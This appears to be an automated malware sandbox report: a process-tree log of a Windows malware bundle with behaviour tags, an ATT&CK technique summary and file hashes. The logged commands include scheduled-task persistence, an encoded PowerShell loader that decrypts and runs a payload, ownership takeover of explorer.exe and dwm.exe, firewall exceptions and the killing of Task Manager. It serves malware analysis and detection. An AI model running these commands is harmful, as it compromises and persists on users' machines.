C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f15⤵
- Scheduled Task/Job: Scheduled Task
PID:3980
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\q4h6tRqPGKlt.bat" "15⤵PID:912
-
C:\Windows\system32\chcp.comchcp 6500116⤵PID:1960
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost16⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1584
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"16⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3672 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f17⤵
- Scheduled Task/Job: Scheduled Task
PID:3764
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\gG9wgEqT0Yi7.bat" "17⤵PID:3096
-
C:\Windows\system32\chcp.comchcp 6500118⤵PID:3916
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost18⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2736
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"18⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3012 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f19⤵
- Scheduled Task/Job: Scheduled Task
PID:2368
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\TybnXfTvuZrT.bat" "19⤵PID:1152
-
C:\Windows\system32\chcp.comchcp 6500120⤵PID:3176
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost20⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2968
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"20⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4028 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f21⤵
- Scheduled Task/Job: Scheduled Task
PID:1552
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\o1nAdZ2g3zw7.bat" "21⤵PID:2616
-
C:\Windows\system32\chcp.comchcp 6500122⤵PID:3184
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost22⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2716
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"22⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1976 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f23⤵
- Scheduled Task/Job: Scheduled Task
PID:4092
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\055e9eEOcAVh.bat" "23⤵PID:2036
-
C:\Windows\system32\chcp.comchcp 6500124⤵PID:3136
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost24⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:980
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"24⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3252 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f25⤵
- Scheduled Task/Job: Scheduled Task
PID:2744
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YE7ZF7vxV77i.bat" "25⤵PID:2736
-
C:\Windows\system32\chcp.comchcp 6500126⤵PID:3876
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost26⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3352
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"26⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3184 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f27⤵
- Scheduled Task/Job: Scheduled Task
PID:1496
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\CAi9VdQMecCj.bat" "27⤵PID:3436
-
C:\Windows\system32\chcp.comchcp 6500128⤵PID:2216
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost28⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4040
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"28⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1520 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f29⤵
- Scheduled Task/Job: Scheduled Task
PID:2040
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\16AzFX3MqkNi.bat" "29⤵PID:2936
-
C:\Windows\system32\chcp.comchcp 6500130⤵PID:3312
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost30⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3712
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"30⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2788 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f31⤵
- Scheduled Task/Job: Scheduled Task
PID:2040
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\peZOMyohVVw6.bat" "31⤵PID:2304
-
C:\Windows\system32\chcp.comchcp 6500132⤵PID:1744
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost32⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1524
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\vir_b0101f2a-a3f0-48c4-bf84-06bd65d62fde\the.exethe.exe3⤵
- Executes dropped EXE
PID:4052 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgAMQAwADAAMAAwACkACgAKACQARQYkBkIGKgYgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABUAGUAbQBwAFAAYQB0AGgAKAApAAoAJABGBkUGSAYwBiwGIAA9ACAAJwBmAGkAbABlAC0AKgAuAHAAdQB0AGkAawAnAAoAJABFBkQGQQZfACMGLgZKBjEGIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQARQYkBkIGKgYgAC0ARgBpAGwAdABlAHIAIAAkAEYGRQZIBjAGLAYgAHwAIABTAG8AcgB0AC0ATwBiAGoAZQBjAHQAIABMAGEAcwB0AFcAcgBpAHQAZQBUAGkAbQBlACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEYAaQByAHMAdAAgADEACgAKAGYAdQBuAGMAdABpAG8AbgAgAEEGQwZfACcGRAYqBjQGQQZKBjEGIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGQQYqBicGLQYsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiwACgAgACAAIAAgACAAIAAgACAAWwBiAHkAdABlAFsAXQBdACQAKAZKBicGRgYnBioGCgAgACAAIAAgACkACgAKACAAIAAgACAAJABFBjQGQQYxBiAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJABFBjQGQQYxBi4ATQBvAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBDAGkAcABoAGUAcgBNAG8AZABlAF0AOgA6AEMAQgBDAAoAIAAgACAAIAAkAEUGNAZBBjEGLgBQAGEAZABkAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAFAAYQBkAGQAaQBuAGcATQBvAGQAZQBdADoAOgBQAEsAQwBTADcACgAKACAAIAAgACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYgAD0AIAAkAEUGNAZBBjEGLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQARQZBBioGJwYtBiwAIAAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBikACgAgACAAIAAgACQAKAZKBicGRgYnBioGXwBFBkEGQwZIBkMGKQZfACcGRAYqBjQGQQZKBjEGIAA9ACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkACgGSgYnBkYGJwYqBiwAIAAwACwAIAAkACgGSgYnBkYGJwYqBi4ATABlAG4AZwB0AGgAKQAKAAkACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJAAoBkoGJwZGBicGKgZfAEUGQQZDBkgGQwYpBl8AJwZEBioGNAZBBkoGMQYKAH0ACgAKACQARQZBBioGJwYtBiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4AEQAOAAsACAAMAB4ADIARgAsACAAMAB4ADEARgAsACAAMAB4ADYAQwAsACAAMAB4ADQARQAsACAAMAB4ADgAOAAsACAAMAB4ADQANQAsACAAMAB4AEQARAAsACAAMAB4ADEAQQAsACAAMAB4AEUARAAsACAAMAB4ADUAQwAsACAAMAB4ADQAQgAsACAAMAB4ADQAOQAsACAAMAB4ADQAOQAsACAAMAB4ADAAQwAsACAAMAB4ADMAQgAsACAAMAB4AEYAQQAsACAAMAB4AEEAMQAsACAAMAB4ADIANwAsACAAMAB4ADMARAAsACAAMAB4ADIAQQAsACAAMAB4AEIANQAsACAAMAB4AEMARAAsACAAMAB4ADIANwAsACAAMAB4ADQARAAsACAAMAB4ADAAQQAsACAAMAB4ADUAOQAsACAAMAB4ADUANwAsACAAMAB4AEMAQQAsACAAMAB4ADcAMAAsACAAMAB4AEEAQQAsACAAMAB4AEMAQgApAAoAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAAxAEMALAAgADAAeABBADMALAAgADAAeAAzADQALAAgADAAeABBADYALAAgADAAeAA4ADQALAAgADAAeABDAEMALAAgADAAeABBAEEALAAgADAAeABEADIALAAgADAAeABCADAALAAgADAAeABFAEUALAAgADAAeABBAEMALAAgADAAeABEADcALAAgADAAeABFAEIALAAgADAAeABGAEUALAAgADAAeAA4AEYALAAgADAAeAA5ADkAKQAKAAoAaQBmACAAKAAkAEUGRAZBBl8AIwYuBkoGMQYgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AAoAIAAgACAAIAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGIAA9ACAAJABFBkQGQQZfACMGLgZKBjEGLgBGAHUAbABsAE4AYQBtAGUACgAgACAAIAAgACQAKAYnBkoGKgYnBioGXwBFBjQGQQYxBikGIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGKQA7AAoAIAAgACAAIAAkAEUGLQYqBkgGSQZfAEUGQQZDBkgGQwZfACcGRAYqBjQGQQZKBjEGIAA9ACAAQQZDBl8AJwZEBioGNAZBBkoGMQYgAC0ARQZBBioGJwYtBiAAJABFBkEGKgYnBi0GIAAtAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiAAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAC0AKAZKBicGRgYnBioGIAAkACgGJwZKBioGJwYqBl8ARQY0BkEGMQYpBgoACgAgACAAIAAgACQAKgYsBkUGSgY5BiAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQARQYtBioGSAZJBl8ARQZBBkMGSAZDBl8AJwZEBioGNAZBBkoGMQYpACkAOwAKACAAIAAgACAAJABGBkIGNwYpBl8AJwZEBi8GLgZIBkQGIAA9ACAAJAAqBiwGRQZKBjkGLgBFAG4AdAByAHkAUABvAGkAbgB0ADsACgAgACAAIAAgACQARgZCBjcGKQZfACcGRAYvBi4GSAZEBi4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgB9AAoA4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:768
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im taskmgr.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3964
-
-
C:\Users\Admin\AppData\Local\Temp\vir_b0101f2a-a3f0-48c4-bf84-06bd65d62fde\wimloader.dllwimloader.dll3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3772 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\wimloader_ab3e1f6f-91bc-42a4-993f-99e659df6ecd\caller.cmd" "4⤵PID:900
-
-
-
C:\Users\Admin\AppData\Local\Temp\vir_b0101f2a-a3f0-48c4-bf84-06bd65d62fde\ac3.exeac3.exe3⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
PID:2164
-
-
C:\Windows\SysWOW64\notepad.exe"C:\Windows\System32\notepad.exe" "C:\Users\Admin\AppData\Local\Temp\vir_b0101f2a-a3f0-48c4-bf84-06bd65d62fde\shell1.ps1"3⤵PID:1300
-
-
C:\Windows\SysWOW64\PING.EXEping trustsentry.com -t -n 1 -s 4 -43⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1628
-
-
C:\Windows\SysWOW64\PING.EXEping ya.ru -t -n 1 -s 4 -43⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2264
-
-
C:\Windows\SysWOW64\PING.EXEping tria.ge -t -n 1 -s 4 -43⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4088
-
-
C:\Windows\SysWOW64\xcopy.exexcopy bloatware C:\Users\Admin\Desktop3⤵
- Enumerates system info in registry
PID:1920
-
-
C:\Windows\SysWOW64\xcopy.exexcopy beastify.url C:\Users\Admin\Desktop3⤵
- Enumerates system info in registry
PID:3836
-
-
C:\Windows\SysWOW64\xcopy.exexcopy shell1.ps1 C:\Users\Admin\Desktop3⤵
- Enumerates system info in registry
PID:3952
-
-
C:\Windows\SysWOW64\takeown.exetakeown /R /F C:\Windows\explorer.exe3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3688
-
-
C:\Windows\SysWOW64\icacls.exeicacls c:\Windows\explorer.exe /grant Admin:(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:2888
-
-
C:\Windows\SysWOW64\takeown.exetakeown /R /F C:\Windows\System32\dwm.exe3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3252
-
-
C:\Windows\SysWOW64\icacls.exeicacls c:\Windows\System32\dwm.exe /grant Admin:(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3796
-
-
C:\Windows\SysWOW64\xcopy.exexcopy xcer.cer C:\Users\Admin\Desktop3⤵
- Enumerates system info in registry
PID:376
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 153⤵
- Delays execution with timeout.exe
PID:2084
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 153⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:1280
-
-
C:\Users\Admin\AppData\Local\Temp\vir_b0101f2a-a3f0-48c4-bf84-06bd65d62fde\freebobux.exefreebobux.exe3⤵
- Executes dropped EXE
PID:744 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\4309.tmp\freebobux.bat""4⤵
- Loads dropped DLL
PID:2104 -
C:\Users\Admin\AppData\Local\Temp\4309.tmp\CLWCP.execlwcp c:\temp\bg.bmp5⤵
- Executes dropped EXE
- Sets desktop wallpaper using registry
PID:3096
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4309.tmp\x.vbs"5⤵
- Suspicious use of FindShellTrayWindow
PID:2400
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\vir_b0101f2a-a3f0-48c4-bf84-06bd65d62fde\SolaraBootstraper.exeSolaraBootstraper.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1804 -
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4000
-
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1540 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1628
-
-
-
C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe"C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe"4⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
PID:4060 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe" "!FIXInj.exe" ENABLE5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3456
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ctfmon.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1936
-
-
C:\Users\Admin\AppData\Local\Temp\vir_b0101f2a-a3f0-48c4-bf84-06bd65d62fde\wim.dllwim.dll3⤵
- Executes dropped EXE
PID:3008 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\wim_4faba669-5421-4476-9f46-39aa3f44b0ad\load.cmd" "4⤵PID:3172
-
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Local\Temp\wim_4faba669-5421-4476-9f46-39aa3f44b0ad\cringe.mp4"5⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:1624
-
-
C:\Windows\SysWOW64\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\wim_4faba669-5421-4476-9f46-39aa3f44b0ad\lol.ini5⤵PID:2060
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\wim_4faba669-5421-4476-9f46-39aa3f44b0ad\mailgooglecom.json5⤵
- Modifies registry class
PID:2888
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\wim_4faba669-5421-4476-9f46-39aa3f44b0ad\CLOCK.py5⤵
- Modifies registry class
PID:3988
-
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" cryptext.dll,CryptExtOpenCER C:\Users\Admin\AppData\Local\Temp\vir_b0101f2a-a3f0-48c4-bf84-06bd65d62fde\xcer.cer3⤵PID:1260
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2608 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2608 CREDAT:275457 /prefetch:22⤵
- Suspicious use of SetWindowsHookEx
PID:1572
-
-
C:\Windows\system32\efsui.exeefsui.exe /efs /keybackup1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2892
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-19168887561958330421120432708-1564752193-959257746-176002023313675944851246596892"1⤵PID:3244
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x5a01⤵
- Suspicious use of AdjustPrivilegeToken
PID:1164
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "3395850796833887515025456031344058396500299310-1542943936-13708321941117306039"1⤵PID:3668
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-26389739848149109-925275756-717310284-1838676713-1350129184-789497862193661613"1⤵PID:2028
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-68479951026815566-1790282517-900685331429886168885178442-16299215570591543"1⤵PID:2836
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "698667418-358535441-68677370717678998811090459107-7546379201067674481-897162809"1⤵PID:3196
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-214144636-4300586791697110487-937328980-7108381215634943883515599471995744792"1⤵PID:1772
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1065015003258927073-439229801-6935832591306455332-2090905250843155850-125304514"1⤵PID:1628
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-7589686181087866402496981892-456672643718213519-16376788471242062218766240717"1⤵PID:940
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-2090463179-1766862364-1476297691-44783257-131177906421224272091169430206-20389935"1⤵PID:3024
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-518141990760827174-1221509531-889302349-8603468751202393535-8429043358531254"1⤵PID:2620
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-295984263-537106322-1287618901-192071973612728629761873226777-14720631531127707690"1⤵PID:936
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-5012535522132323193-1715744749-66650466917882821722101599675-14920368622029192023"1⤵PID:3692
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1215949404-1582647183-1487884944-1138793829-3541880077810124491375622319-655074234"1⤵PID:2864
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1332706502337759390-611047235-13471035157130276428552441941186528892-1775105975"1⤵PID:3168
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-15768649237028728427833863371430827085-190075933118330975475568020771848348535"1⤵PID:3808
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "13625074512022491293-14952151445464343011027136024906736301-13841006832014446031"1⤵PID:2992
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1575923649-2071791626-282203504-313462918-16966305961023043030-1476034660-788151779"1⤵PID:3096
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "4829458031100590867-32961832503386325-554302623-970044073661693941897891693"1⤵PID:656
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-571383770-10293723758029816922012715125-984811796-924887224738073358-435411072"1⤵PID:2876
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-872763114-719323837-1097644642-8237860222111986891543833967-745950785130451796"1⤵PID:1780
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1015838794-834675855468306851-14007126581071678778-597349744-1297774989-2046055450"1⤵PID:3104
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-87270282789045286598826154-1631542096323171460632490869-1883549239939830156"1⤵PID:4084
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-205619864711308054351219664396-1996463216-12078415721588613867202026380-1237820375"1⤵PID:3340
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1669443110-1695986066-352324633227867890143379912317609568281881254808496568079"1⤵PID:3976
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1404279457-4492335971505484611-234156657-1056538591-1348725133-645262762-1124519850"1⤵PID:2320
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-8542778921032453394758348236-1414866436-1689046088-769372388944297011482861447"1⤵PID:4012
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1Scheduled Task/Job
1Scheduled Task
1Persistence
BITS Jobs
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Access Token Manipulation
1Create Process with Token
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Access Token Manipulation
1Create Process with Token
1BITS Jobs
1File and Directory Permissions Modification
1Hide Artifacts
2Hidden Files and Directories
2Impair Defenses
3Disable or Modify System Firewall
1Disable or Modify Tools
2Modify Registry
9Obfuscated Files or Information
1Command Obfuscation
1Subvert Trust Controls
2Install Root Certificate
1SIP and Trust Provider Hijacking
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Discovery
Password Policy Discovery
1Peripheral Device Discovery
1Process Discovery
1Query Registry
5Remote System Discovery
1System Information Discovery
6System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.9MB
MD56bb0ab3bcd076a01605f291b23ac11ba
SHA1c486e244a5458cb759b35c12b342a33230b19cdf
SHA256959dafbfab08f5b96d806d4ad80e4c3360759c264d3028e35483a73a89aa1908
SHA512d1123feb97fbf1593ce1df687b793a41f398c9a00437e6d40331ad63b35fc7706db32a0c6f0504cff72ea2c60775b14f4c0d5a8955988048bed5ba61fa007621
-
Filesize
1KB
MD555540a230bdab55187a841cfe1aa1545
SHA1363e4734f757bdeb89868efe94907774a327695e
SHA256d73494e3446b02167573b3cde3ae1c8584ac26e15e45ac3ec0326708425d90fb
SHA512c899cb1d31d3214fd9dc8626a55e40580d3b2224bf34310c2abd85d0f63e2dedaeae57832f048c2f500cb2cbf83683fcb14139af3f0b5251606076cdb4689c54
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\070E0202839D9D67350CD2613E78E416
Filesize230B
MD536cced1ae9893e70dedb4b69605af35f
SHA1d3a72624a50679ce68b8baf7c878c787797cbf5c
SHA2565831f1aeff1fd5fdf82bfb5ef3d631cc38f4e10fae017f39c6f27132af853094
